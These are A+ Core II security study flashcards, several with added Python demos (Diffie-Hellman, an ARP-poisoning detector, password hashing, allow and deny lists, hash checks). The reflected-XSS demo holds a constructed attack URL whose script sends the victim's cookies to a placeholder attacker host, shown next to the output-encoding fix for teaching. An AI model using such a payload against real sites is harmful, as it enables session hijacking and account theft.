A+ Core II 2.0 Security Flashcards

1
Q

What is the list of different PHYSICAL forms of security used in protecting a data center?

A

*Access control vestibule
*Badge reader
*Video surveillance
*Alarm systems
*Door locks
*Equipment locks
*Guards and access lists
*Barricades / Bollards
*Fences

2
Q

What is an access control list?

A

A set of rules attached to an object (a file, folder, or network resource) that specifies which users or groups may access it and which operations (read, write, execute) they are allowed to perform on it.

3
Q

What is NAT?

A

Network Address Translation: A way to map multiple private addresses inside a local network to a public IP address before transferring the information onto the internet

4
Q

What is QoS?

A

Quality of Service: The use of mechanisms or technologies that work on a network to control traffic and ensure the performance of important apps with limited network capacity.

5
Q

What is ICMP?

A

Internet Control Message Protocol: A protocol that devices within a network use to communicate problems with data transmission.

6
Q

What is an Active Directory?

A

Microsoft's directory service for Windows domains: a centralized database of the users, groups, computers, and policies on the network, which domain controllers use to authenticate accounts and manage resources.

7
Q

What is an OU in an Active Directory?

A

Organizational Unit: a container within an Active Directory domain in which you can place users, groups, computers, and other OUs. OUs are used to organize large directories, to delegate administration of a subset of objects, and to apply Group Policy to just that subset.

8
Q

What are logon scripts?

A

Scripts that run automatically when a user logs on so that administrators can configure the user's working environment: mapping network drives, connecting printers, setting user-specific environment variables, and similar tasks. They are assigned in the user's account properties or through Group Policy.

9
Q

What is the centralized Windows feature that lets administrators manage settings for users and computers across a domain?

A

Group Policy (managed with the Group Policy Management Console on a domain, or gpedit.msc for local policy on a single machine)

10
Q

What is the purpose of a home folder?

A

A centralized shared folder meant for users to store their files in instead of the local storage.

11
Q

What encryption methods does WPA2 use?

A

CCMP: Counter Mode with Cipher Block Chaining Message Authentication Code Protocol. It uses AES in counter mode for confidentiality and a CBC-MAC for integrity, replacing WEP's RC4 and WPA's TKIP.

12
Q

What encryption methods does WPA3 use?

A

GCMP: Galois/Counter Mode Protocol, AES in GCM mode, which provides encryption and integrity in a single pass and is stronger and faster than CCMP. (GCMP-256 is mandatory in WPA3-Enterprise 192-bit mode; WPA3-Personal networks commonly still run CCMP-128, the key change there being SAE in place of PSK authentication.)

13
Q

What is the PSK authentication process?

A

Using a pre-shared key shared between two parties to log onto a network

14
Q

What is the main issue with WPA2s PSK authentication method?

A

Attackers can passively capture the four-way handshake (or provoke one by deauthenticating a client) and then run an offline dictionary or brute-force attack: each candidate passphrase is hashed with the SSID and checked against the captured handshake, with no further interaction with the access point, so the only limit is the attacker's hardware and the strength of the passphrase.

15
Q

In what way is the PSK brute-force problem remedied with WPA3?

A

WPA3 replaces PSK authentication with SAE (Simultaneous Authentication of Equals), a password-authenticated key exchange built on Diffie-Hellman. Both sides prove knowledge of the password without ever sending a hash of it, and every session derives a fresh key, so a captured exchange cannot be attacked offline: an attacker gets one guess per live exchange with the access point. The four-way handshake still follows SAE, but it no longer exposes anything an attacker can test passphrase guesses against.

16
Q

What kind of encryption method allows two devices to derive a shared key without actually sending the keys across the network?

A

Diffie-Hellman key exchange
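
The exchange the card names, as an added example that is not part of the original flashcards. Each side publishes only g^a mod p; the eavesdropper sees both public values and the group parameters but cannot recover the key without a private exponent. The group parameters (the Mersenne prime 2^127-1 and generator 5) are a toy choice made here for readability; real deployments use a standardized 2048-bit or larger MODP group or an elliptic curve, and WPA3's SAE builds its password-authenticated exchange on the same idea.

```python
"""Diffie-Hellman key agreement: a shared key without the key crossing the wire."""
import hashlib
import secrets

# Toy group parameters (chosen for this demo, not from the flashcards).
P = (1 << 127) - 1
G = 5


def generate_keypair(p=P, g=G):
    """Pick a random private exponent a and publish g^a mod p."""
    private = secrets.randbelow(p - 3) + 2          # 2 <= a <= p-2
    return private, pow(g, private, p)


def derive_shared_secret(my_private, their_public, p=P):
    """Compute their_public^my_private mod p; both parties arrive at the same value."""
    if not 1 < their_public < p - 1:
        # Reject 0, 1 and p-1: a peer sending those forces the secret into a tiny set.
        raise ValueError("peer public value out of range")
    return pow(their_public, my_private, p)


def shared_key(my_private, their_public, p=P):
    """Hash the shared secret into a fixed-size symmetric key (a stand-in for a real KDF)."""
    secret = derive_shared_secret(my_private, their_public, p)
    return hashlib.sha256(secret.to_bytes((p.bit_length() + 7) // 8, "big")).hexdigest()


def demo_exchange():
    """Alice and Bob exchange only public values; returns the key each side derived."""
    alice_priv, alice_pub = generate_keypair()
    bob_priv, bob_pub = generate_keypair()
    # alice_pub and bob_pub are what crosses the network; the private exponents never do.
    return shared_key(alice_priv, bob_pub), shared_key(bob_priv, alice_pub)


if __name__ == "__main__":
    k1, k2 = demo_exchange()
    print("both sides derived the same key:", k1 == k2)
```

Plain Diffie-Hellman authenticates nobody, which is why an on-path attacker can run one exchange with each side; protocols such as TLS and SAE add authentication (certificates, or the shared password) on top of it.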

17
Q

What is the RADIUS authentication mode?

A

Remote Authentication Dial-In User Service: one of the most common AAA (authentication, authorization, accounting) protocols, supported on a wide variety of platforms and devices. Network devices such as VPN concentrators, switches, and wireless controllers forward a user's credentials to a central RADIUS server, which usually checks them against a directory such as Active Directory.

18
Q

What remote authentication protocol is commonly used with Cisco devices?

A

TACACS/TACACS+

19
Q

What network authentication protocol is commonly used in Windows OSes?

A

Kerberos

20
Q

What authentication method should you use if; You have a RADIUS server and a VPN concentrator that can talk to a RADIUS server?

A

RADIUS

21
Q

What authentication method should you use if you have a Cisco device?

A

TACACS/TACACS+

22
Q

What authentication method should you use if you’re using a Microsoft Windows device?

A

Kerberos

23
Q

List malware types and methods:

A

*Trojan Horse
*Rootkit
*Viruses
*Spyware
*Ransomware
*Keylogger
*Boot sector virus
*Cryptominers

24
Q

Describe a Trojan horse

A

Software that pretends to be something helpful/harmless. Better trojan horses are built to circumvent your existing security.

25
Q

Describe a rootkit

A

Originally a Unix technique, this is a form of malware that can modify the system core files and embed itself in the kernel

26
Q

What are some ways to find and remove rootkits?

A

*Use anti-malware scans to find any unusual activity
*Use a remover specific to the rootkit
*Secure boot with UEFI

27
Q

Describe a virus

A

Malware that attaches itself to files or programs and replicates when they are run or copied, spreading through file systems or network shares. Some viruses carry a destructive payload; others only propagate.

28
Q

Describe a boot sector virus.

A

A virus that infects the boot sector or boot loader of a drive so that its code runs before the operating system is loaded, which also lets it evade protections the OS would normally provide.

29
Q

Describe spyware

A

Malware that spies on you via browser monitoring or keyloggers

30
Q

Describe ransomware

A

A form of malware that encrypts your data. To get the encryption key for your data, you need to pay a ransom to the attackers

31
Q

Describe how cryptominers work

A

Cryptocurrency mining requires “proof of work”, which usually consists of a difficult math problem. Attackers install malware into other people’s devices and use their CPU to process these calculations for their cryptocurrency.

32
Q

What Windows environment provides a command prompt that can be used as a last resort to remove malware that cannot be cleaned from the running system?

A

Windows Recovery Environment (WinRE), booted from the recovery partition or from installation media so that the infected operating system is not running while you work on it

33
Q

How can you start the Windows recovery environment?

A

*All Windows versions: Hold the Shift key while clicking Restart, or boot from installation media

*Windows 10: Settings>Update & Security>Recovery>Advanced startup

*Windows 11: Settings>System>Recovery>Advanced startup>Restart now

*After rebooting: Troubleshoot>Advanced options>Command Prompt

34
Q

What are some ways/techniques that can be used to prevent/rid of malware or viruses on a system?

A

*Windows Recovery Environment (Last resort)

*Anti-virus/ Anti-malware

*Software firewalls

*Anti-phishing training

*End-user education

*OS reinstallation

35
Q

List some different social engineering tactics:

A

*Phishing/Vishing/Smishing
*Spear Phishing
*Tailgating/Piggybacking
*Impersonation
*Dumpster diving
*Wireless evil twin
*Shoulder Surfing

36
Q

What is the definition of Denial of Service?

A

To force a service to fail by overloading, or exploiting a design flaw

37
Q

What is a zero-day attack?

A

An attack that exploits a vulnerability the vendor does not yet know about and has no patch for, so defenders have had "zero days" to prepare for it.

38
Q

What is an on-path attack?

A

When an attacker positions themselves between two communicating devices so that the traffic passes through them; they can read the data and may also alter it without either party noticing (formerly called a man-in-the-middle attack)

39
Q

What is an on-path attack that takes place on a local IP subnet called?

A

ARP poisoning

40
Q

What does ARP stand for in ARP poisoning?

A

ARP = Address Resolution Protocol: the protocol hosts on a local network use to map an IP address to the MAC (hardware) address that should receive the frame. ARP replies carry no authentication, so an attacker can send forged replies claiming the gateway's IP address and have other hosts send their traffic to the attacker's MAC address.
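
A small detector for the attack the card describes, added here as an example and not part of the original flashcards. It watches ARP replies and flags any IP address whose MAC binding changes, which is exactly what a poisoning attempt against the gateway looks like. The log lines are constructed in tcpdump's style for the demo; the IP and MAC addresses are made up, and the optional `trusted` table is an assumption for sites that already know their gateway's real MAC.

```python
"""Detect ARP poisoning from a log of ARP replies (constructed sample data)."""
import re

# Constructed tcpdump-style lines, not real traffic: the gateway 192.168.1.1
# is first announced at its real MAC and then "moves" to an attacker's MAC.
SAMPLE_ARP_LOG = """\
10:00:01.120 ARP, Reply 192.168.1.1 is-at 00:11:22:33:44:55, length 28
10:00:02.440 ARP, Reply 192.168.1.20 is-at 00:aa:bb:cc:dd:20, length 28
10:00:05.003 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01, length 28
10:00:05.010 ARP, Reply 192.168.1.1 is-at de:ad:be:ef:00:01, length 28
"""

ARP_REPLY = re.compile(
    r"^(?P<ts>\S+) ARP, Reply (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) is-at "
    r"(?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})",
    re.IGNORECASE,
)


def detect_arp_changes(log_text, trusted=None):
    """Return one alert per ARP reply that rebinds an IP to a different MAC.

    trusted: optional {ip: mac} of bindings you already know (for example the
    gateway's real MAC), so the very first poisoned reply is caught even if no
    earlier legitimate reply appears in the log.
    """
    seen = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    alerts = []
    for line in log_text.splitlines():
        m = ARP_REPLY.match(line)
        if not m:
            continue  # not an ARP reply; ignore
        ip, mac, ts = m["ip"], m["mac"].lower(), m["ts"]
        previous = seen.get(ip)
        if previous is None:
            seen[ip] = mac                      # first time we see this IP: learn it
        elif previous != mac:
            alerts.append({"time": ts, "ip": ip, "old_mac": previous, "new_mac": mac})
            seen[ip] = mac                      # keep tracking so a flip back is reported too
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_changes(SAMPLE_ARP_LOG):
        print(f"{alert['time']} {alert['ip']} changed {alert['old_mac']} -> {alert['new_mac']}")
```

On a real network the same check is what managed switches call Dynamic ARP Inspection; on a small network, a static ARP entry for the gateway on critical hosts achieves a similar effect.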

41
Q

What does it mean to store passwords “in the clear”?

A

To store account passwords as plaintext, with no hashing, so that anyone who can read the password file or database sees every password. (Not a recommended way to store passwords: they should be stored as salted hashes produced by a slow password-hashing function, so that a breach of the store does not immediately hand over the passwords.)
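
The anti-pattern beside its fix, as an added example that is not part of the original flashcards: one function writes the password itself to the store, the other writes a random per-user salt and a PBKDF2-HMAC-SHA256 hash, and `verify` recomputes and compares in constant time. The in-memory dictionary stands in for a database table, the iteration count follows OWASP's published PBKDF2 guidance, and the usernames and passwords are made up.

```python
"""Storing passwords 'in the clear' versus as salted, slow hashes."""
import hashlib
import hmac
import os

ITERATIONS = 600_000   # PBKDF2-HMAC-SHA256 work factor; tune so one hash takes ~100 ms


def store_in_the_clear(db, username, password):
    """The anti-pattern the card describes: the password itself is written to the store."""
    db[username] = {"password": password}


def _pbkdf2(password, salt, iterations):
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations, dklen=32)


def store_hashed(db, username, password, iterations=ITERATIONS):
    """Store a random per-user salt plus the slow hash; the password is never written."""
    salt = os.urandom(16)
    db[username] = {
        "algo": "pbkdf2_sha256",
        "iterations": iterations,
        "salt": salt.hex(),
        "hash": _pbkdf2(password, salt, iterations).hex(),
    }


_DUMMY_SALT = os.urandom(16)


def verify(db, username, password):
    """Recompute from the stored salt and compare in constant time.

    For an unknown user we still do one hash so that response time does not
    reveal whether the username exists.
    """
    record = db.get(username)
    if record is None or "hash" not in record:
        _pbkdf2(password, _DUMMY_SALT, ITERATIONS)
        return False
    computed = _pbkdf2(password, bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(computed, bytes.fromhex(record["hash"]))


def leaked_passwords(db):
    """What someone who dumps the table learns immediately: only the plaintext entries."""
    return {user: rec["password"] for user, rec in db.items() if "password" in rec}


if __name__ == "__main__":
    users = {}
    store_in_the_clear(users, "legacy", "hunter2")
    store_hashed(users, "alice", "correct horse battery staple")
    print("exposed by a dump:", leaked_passwords(users))
    print("alice logs in:", verify(users, "alice", "correct horse battery staple"))
```

Two users with the same password get different hashes because of the salt, which is what defeats precomputed (rainbow) tables; the iteration count is what makes each guess expensive for an attacker who does steal the table.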

42
Q

What is an insider threat in terms of Cyber Security?

A

A threat that originates from someone inside the organization, such as an employee or contractor with legitimate access, who misuses that access either maliciously or through negligence

43
Q

What is code injection?

A

Inserting attacker-controlled data into an application where it is interpreted as code or commands (SQL, HTML/JavaScript, shell commands, LDAP queries). It is usually possible because the application fails to validate or sanitize user input before using it.

44
Q

What is Cross-site scripting (XSS)?

A

An attack in which the attacker gets their own script (usually JavaScript) into a web page that the victim's browser trusts, by abusing a site that echoes user input into its pages without encoding it. The script then runs in the victim's browser with that site's privileges.

45
Q

Break down a non-persistent (reflected) XSS

A

*The web site echoes user input back into a page without encoding it (a search box is a common source)

*The attacker crafts a link to that site with a script embedded in a URL parameter and emails it to the victim

*When the victim clicks the link, the server reflects the script into its response and the browser executes it as if it came from the web server

*The script sends the victim's session ID, cookies, or credentials to the attacker

*The attacker uses the stolen session to act as the victim without their knowledge
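
The reflected XSS above in code, as an added example that is not part of the original flashcards: a search handler that echoes the `q` parameter raw, beside the same handler with HTML output encoding. The shop and attacker host names, the HTML template and the attack URL are constructed for the demo.

```python
"""Reflected XSS: a search page that echoes its query, vulnerable and fixed."""
from html import escape
from urllib.parse import parse_qs, urlparse

TEMPLATE = "<html><body><h1>Results for: {term}</h1></body></html>"


def _query_term(url):
    """Pull the q= parameter out of a request URL, percent-decoded as a server would."""
    return parse_qs(urlparse(url).query).get("q", [""])[0]


def render_search_vulnerable(url):
    # Bug: untrusted input is placed straight into the HTML, so a <script> in q
    # is sent back to the browser and executed in the site's origin.
    return TEMPLATE.format(term=_query_term(url))


def render_search_fixed(url):
    # Fix: encode untrusted data for the HTML context before inserting it.
    # The text still shows up on the page, but as literal characters, not markup.
    return TEMPLATE.format(term=escape(_query_term(url), quote=True))


def has_script_tag(html_doc):
    """Crude check for the demo: does the rendered page contain a live <script> tag?"""
    return "<script" in html_doc.lower()


# Constructed attacker link: the payload loads an image from attacker.example
# (a placeholder host) with the victim's cookies in the query string.
ATTACK_URL = (
    "https://shop.example/search?q="
    "%3Cscript%3Enew%20Image%28%29.src%3D%27https%3A%2F%2Fattacker.example%2F%3Fc%3D%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)

if __name__ == "__main__":
    print("vulnerable:", render_search_vulnerable(ATTACK_URL))
    print("fixed:     ", render_search_fixed(ATTACK_URL))
```

Output encoding is the fix that addresses the root cause; marking the session cookie `HttpOnly` and sending a Content-Security-Policy header limit the damage if an encoding is missed somewhere else.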

46
Q

What does a firewall exception do?

A

Allows an app or feature through the Windows Firewall

47
Q

Where can you go to temporarily disable your firewall?

A

Control Panel>Windows Defender Firewall(Requires elevation)

48
Q

What are a few ways to log on to a Windows System?

A

*Local Accounts

*Microsoft accounts (Sync between devices, integrate apps like Skype or Office with OneDrive)

*Windows Domain Accounts

49
Q

What is the order of the User Hierarchy in Windows systems?

A

*Administrators

*Standard Users

*Guest (Limited Access)

50
Q

What is the function of BitLocker?

A

You can select it to encrypt all of your data in a drive, even the Operating System.

51
Q

What is EFS?

A

Encrypting File System: a service integrated into NTFS that encrypts individual files and folders at the file system level. Use it when you don't want to encrypt an entire Windows drive but do want to encrypt specific files.

52
Q

What is the best practice for protecting data on a USB drive?

A

Make sure all data on USB drives are encrypted, as losing them can pose a risk of your data being leaked.

53
Q

What are some good practices in protecting your encrypted data?

A

*Know where the decryption (recovery) key is; without it the data is unrecoverable
*Keep a backup copy of the recovery key somewhere safe
*In a domain, you can escrow BitLocker recovery keys in Active Directory so an administrator can recover the drive

54
Q

True or false: An attacker can use the default username and password found in a system to gain access to a server or machine.

A

True

55
Q

What are some ways to secure your information when working in public spaces?

A

*Use a privacy filter on your screen to keep onlookers from peeking at your screen

*Keep your monitor away from windows and hallways

56
Q

True or False: Encrypting the data on a USB device is just as important as encrypting any data on a drive?

A

True

57
Q

What are some ways to protect/retain the decryption key?

A

*Have a copy backed up somewhere

*You can integrate it into Active Directory

58
Q

What are some good practices for maintaining strong passwords in an organization?

A

*Set a mandatory password-change interval, commonly 30, 60, or 90 days (note that current NIST SP 800-63B guidance instead recommends changing passwords only on evidence of compromise, favoring length and screening against breached-password lists over forced rotation)

*Have critical systems change their passwords even more frequently

*The recovery process should not be trivial: verify identity before resetting a password

*Change default usernames/passwords

59
Q

What is the best practice for AutoRun and AutoPlay?

A

These features should generally be turned off so that when removable media is inserted its contents do not automatically open or run; AutoRun in particular has been used to launch malware straight from USB drives.

60
Q

Why don’t mobile phones include a firewall? And what are some ways to remedy this vulnerability?

A

Mobile phones don't ship with a firewall because most of their activity is outbound and there are usually no listening services to protect. Third-party firewall apps exist (mostly on Android) for environments that need inbound filtering or per-app network control.

61
Q

What is a way an enterprise can centrally manage an employee’s personal phones?

A

Admins can use an MDM (Mobile Device Management) platform to enroll the phones and centrally set policies such as which apps may be installed, whether the camera is allowed, and requirements for screen locks and encryption; with personal (BYOD) devices, work data is usually kept in a separate managed container.

62
Q

List some examples of IoT devices

A

*Sensors
Heating, cooling, Lighting

*Smart devices
Home automation, video doorbells

*Wearable tech
Watches, health monitors

*Facility Automation
Temperature, air quality, lighting

63
Q

What are some things to consider when there is an IoT device involved in your network?

A

IoT manufacturers are not security professionals, so they may not consider the security risks when making these devices. To remedy this issue, you can add all of your IoT devices to a guest network to isolate them from other devices within the same network.

64
Q

What are some ways you can safely and effectively destroy a device that contains sensitive data?

A

*Shredder

*Drill/Hammer through all platters on a storage device or drill through any chips in an SSD

*Electromagnetic (degaussing): removes the magnetic field, which destroys the drive data and the drive electronics

64
Q

What is low-level formatting in disk formatting?

A

This is the default formatting provided at the factory. This is not a recommended format for the user.

64
Q

What is a certificate of destruction?

A

A certificate that a third-party company hands you after destroying a device. This is to show validation that the device was successfully destroyed without the risk of any data being leaked.

65
Q

What is standard formatting [Quick formatting] in disk formatting?

A

A quick format sets up a new file system (and boot sector) and clears the file table (the MFT on NTFS), but the data in the clusters stays on disk until it is overwritten, so it can still be recovered with file-recovery tools.

66
Q

What is standard formatting [Regular format] in disk formatting?

A

In a regular (full) format the system overwrites every sector with zeros; this has been the default on Windows Vista and later. Because the data is overwritten, it cannot be recovered with file-recovery tools.

67
Q

Whats a SOHO?

A

A small office or home office

68
Q

What is an allow list?

A

A list of explicitly permitted entries (IP addresses, applications, or URLs). Anything not on the list is blocked, so the default is deny; it is the opposite of a deny list.

69
Q

What is a deny list?

A

A list of specific URLs, domains, or IP addresses that are not allowed to be accessed going outbound
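
The difference between the two lists in code, as an added example that is not part of the original flashcards: the same matching logic (CIDR match for addresses, suffix match for domains) is used for both, and the only thing that changes is the default when nothing matches. The networks and host names are documentation/example values made up for the demo.

```python
"""Allow list vs deny list evaluation for a small firewall or content filter."""
import ipaddress
from urllib.parse import urlparse


def _classify(entry):
    """Return ('net', network) for an IP or CIDR entry, or ('host', name) for a domain."""
    try:
        return "net", ipaddress.ip_network(entry, strict=False)
    except ValueError:
        return "host", entry.lower().rstrip(".")


def _split_destination(dest):
    """Accept a URL, a bare host name or an IP; return (ip_or_None, host_or_None)."""
    host = urlparse(dest).hostname if "://" in dest else dest
    host = (host or "").lower().rstrip(".")
    try:
        return ipaddress.ip_address(host), None
    except ValueError:
        return None, host


def _matches(entry, dest):
    kind, value = _classify(entry)
    ip, host = _split_destination(dest)
    if kind == "net":
        return ip is not None and ip in value
    # Domain entries match the name itself and any subdomain of it.
    return host is not None and (host == value or host.endswith("." + value))


def permitted_by_allow_list(dest, allow_list):
    """Allow list: default deny. Only a destination that matches an entry passes."""
    return any(_matches(entry, dest) for entry in allow_list)


def permitted_by_deny_list(dest, deny_list):
    """Deny list: default allow. Only a destination that matches an entry is blocked."""
    return not any(_matches(entry, dest) for entry in deny_list)


if __name__ == "__main__":
    allow = ["203.0.113.0/24", "vpn.example"]
    deny = ["malware.example", "192.0.2.0/24"]
    for dest in ["203.0.113.7", "https://evil.example/", "https://cdn.malware.example/x"]:
        print(dest, "allow-list:", permitted_by_allow_list(dest, allow),
              "deny-list:", permitted_by_deny_list(dest, deny))
```

An allow list is the safer default because an attacker's new domain or address is blocked until someone adds it; a deny list can only ever block what you already know about.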

70
Q

What is content filtering?

A

A feature that allows you (parent, admin, or regular user) to regulate allowing or disallowing access to certain locations.

71
Q

True or False: Content filtering is often done within a single device, such as a router, switch, access point, firewall, etc.

A

True

72
Q

In a SOHO environment, how are IP addresses distributed often?

A

Usually automatically, by the DHCP server built into the SOHO router. Devices that must keep the same address (printers, a NAS, servers) are given a static address or a DHCP reservation.

73
Q

What are DHCP reservations?

A

This is a feature with DHCP servers that lets you assign a specific IP address to a specific MAC address

74
Q

What is UPnP (Universal Plug and Play)?

A

A protocol that lets UPnP-enabled devices on your network automatically discover and communicate with each other

75
Q

What are the best practices as far as UPnP goes?

A

The best practice is to have UPnP disabled unless an application requires it. It is used mainly by peer-to-peer applications, and it lets any device on the LAN open inbound ports on the router with no administrator approval.

76
Q

What is a screened subnet (AKA DMZ- Demilitarized zone)?

A

A separate network segment, typically placed between the Internet-facing firewall and the internal network (or on its own firewall interface), where public-facing servers live. If one of those servers is compromised, the firewall still keeps the attacker away from the rest of the internal network.

77
Q

What is SSID (Service Set Identifier)

A

This is the name of a wireless network. Some examples include: LINKSYS, DEFAULT, NETGEAR

78
Q

What is an open system in networking terms?

A

A wireless network that requires no authentication (e.g. a coffee shop or hotel). Traffic on an open network is not encrypted, so anyone nearby can read it.

79
Q

What encryption methods are typically used in a SOHO environment?

A

WPA/2/3-Personal or WPA/2/3-PSK

80
Q

What encryption methods are typically used in an enterprise setting?

A

WPA/2/3-Enterprise or WPA/2/3-802.1X

81
Q

What is LDAP?

A

Lightweight Directory Access Protocol: a protocol for reading and writing directory services such as Active Directory, used to look up data about organizations, people, devices, and more. It is a lightweight version of DAP (Directory Access Protocol) and uses TCP port 389, or 636 for LDAPS over TLS.

82
Q

What is a guest network? And what are some good practices when it comes to guest networks?

A

A guest network is a router feature that creates a second wireless network separate from your main one. If you don't need it, disable it; if you do, it is a good place for IoT devices or a lab network, because devices on the guest network are isolated from the main network.

83
Q

What is port forwarding?

A

This function takes traffic that is inbound to your router, determines which port is being used, and redirects the network traffic onto the device that is being communicated with

84
Q

True or false: Having you download malicious browser extensions is yet another way attackers can install malware on your device

A

True

85
Q

What can you use to verify a browser’s or app’s hash?

A

Compare the hash the vendor publishes for the download (usually SHA-256) with one you compute locally. Windows includes certutil -hashfile <file> SHA256 and PowerShell's Get-FileHash; third-party hash-checking apps do the same thing. If the two values differ, the file was altered or corrupted and should not be run.
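
The check in code, as an added example that is not part of the original flashcards: the file is streamed through SHA-256 and compared with the published value in constant time. The "installer" bytes, the file names and the tampered copy are constructed in `demo` for the example.

```python
"""Verify a downloaded file against the vendor's published SHA-256 digest."""
import hashlib
import hmac
import os
import tempfile


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path, chunk_size=1 << 20):
    """Stream the file through SHA-256 so a large installer never has to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def verify_download(path, published_hex):
    """True only if the file's SHA-256 equals the published value; constant-time compare."""
    expected = published_hex.strip().lower()
    if len(expected) != 64 or any(c not in "0123456789abcdef" for c in expected):
        raise ValueError("published value is not a SHA-256 hex digest")
    return hmac.compare_digest(sha256_file(path), expected)


def demo():
    """Constructed scenario: a good download and a tampered copy checked against one hash."""
    with tempfile.TemporaryDirectory() as tmp:
        good = os.path.join(tmp, "installer.exe")
        tampered = os.path.join(tmp, "installer-from-mirror.exe")
        with open(good, "wb") as fh:
            fh.write(b"MZ constructed installer bytes")        # stand-in, not a real executable
        with open(tampered, "wb") as fh:
            fh.write(b"MZ constructed installer bytes, plus one appended line")
        published = sha256_file(good)   # what the vendor's download page would list
        return verify_download(good, published), verify_download(tampered, published)


if __name__ == "__main__":
    print("good ok, tampered ok:", demo())
```

The published hash only helps if it comes from a source the attacker cannot also change, so read it from the vendor's HTTPS page rather than from the mirror that served the file; a signed installer (Authenticode on Windows) avoids that problem altogether.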

86
Q

What’s a tool you can use to have all of your credentials from different websites and sources on one centralized website?

A

Password managers

87
Q

What is one way to check the legitimacy of a website?

A

Check the certificate to see if the dates are aligned, the certificate is properly signed, and the domain name matches the certificate

88
Q

How can you find a website’s certificate details in Chrome?

A

Click the menu button on the top right-hand corner of the screen. then go to; More tools>Developer tools, then click on the Security tab
